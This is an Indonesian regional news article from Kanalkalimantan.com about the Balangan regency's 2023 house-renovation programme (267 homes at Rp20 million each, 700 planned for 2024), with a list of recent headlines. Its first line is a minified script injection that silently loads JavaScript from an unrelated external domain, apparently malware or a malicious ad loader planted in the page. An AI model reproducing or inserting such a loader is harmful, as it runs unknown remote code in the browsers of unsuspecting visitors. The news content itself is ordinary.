(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Hingga November 2023 Pemkab Balangan Sudah Bedah 267 Rumah


KANALKALIMANTAN.COM, PARINGIN – Pemerintah Kabupaten (Pemkab) Balangan telah melaksanakan bedah rumah sebanyak 267 unit sepanjang tahun 2023 melalui Dinas PUPR Perkim Balangan.

“Program bedah rumah ini tersebar pada seluruh kecamatan, tahun ini lebih banyak daripada tahun kemarin untuk program bedah rumah tidak layak huni milik warga,” kata Kepala Bidang Perumahan dan Pemukiman Dinas PUPR Perkim Balangan, Rudi Hariadi, Selasa (21/11/2023).

Rudi menuturkan, bedah rumah untuk 2023 ini telah diselesaikan dengan total 267 unit rumah milik warga yang masuk dalam APBD murni tahun 2023.

Secara keseluruhan program bedah rumah yang telah dilaksanakan oleh Pemkab Balangan, selama masa kepemimpinan Bupati dan Wakil Bupati Balangan hingga akhir tahun 2023 ini, adalah sekitar 500 unit.

Selain itu Rudi menjelaskan untuk setiap rumah yang tidak layak huni dianggarkan setiap rumahnya Rp20 juta, yaitu untuk bahan Rp17 juta dan upah tukang Rp3 juta.

Sementara itu untuk tahun 2024, Pemkab Balangan akan melakukan bedah rumah dengan jumlah yang lebih banyak lagi yakni mencapai 700 unit. “Nanti untuk tahun depan akan kita laksanakan lagi bedah rumah sebanyak 700 unit,” jelasnya.

Rudi berharap rumah tidak layak huni di wilayah Kabupaten Balangan, nantinya dapat menjadi tempat yang nyaman bagi warga yang menempatinya setelah dilakukan perbaikan.

Sebagaimana diketahui, program bedah rumah ini merupakan salah satu program milik Pemkab Balangan untuk masyarakat. (Kanalkalimantan.com/mcbalangan/adv)

Editor : kk


Muhammad Andi

Recent Posts

Sekda HSU Sambut Tim Wasev TMMD ke-120

KANALKALIMANTAN.COM, AMUNTAI - Suasana hangat tampak saat Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi… Read More

41 menit ago

Seleksi Wawancara Panwascam Empat Kecamatan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 14 orang calon Panitia Pengawas Kecamatan (Panwascam) di Kota Banjarbaru Kalimantan… Read More

48 menit ago

Satgas TMMD-Warga Desa Sungai Karias Keroyokan Hingga Malam

KANALKALIMANTAN.COM, AMUNTAI - Meski suasana gelap di malam hari tak menjadi penghalang anggota Satgas TNI… Read More

59 menit ago

Bangunan Liar di Atas Sungai Dibongkar Satpol PP Banjarmasin

Kabid Tibum: Bangunan Lainnya Kita Tunggu Proses Selanjutnya Read More

1 jam ago

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

7 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

17 jam ago

This website uses cookies.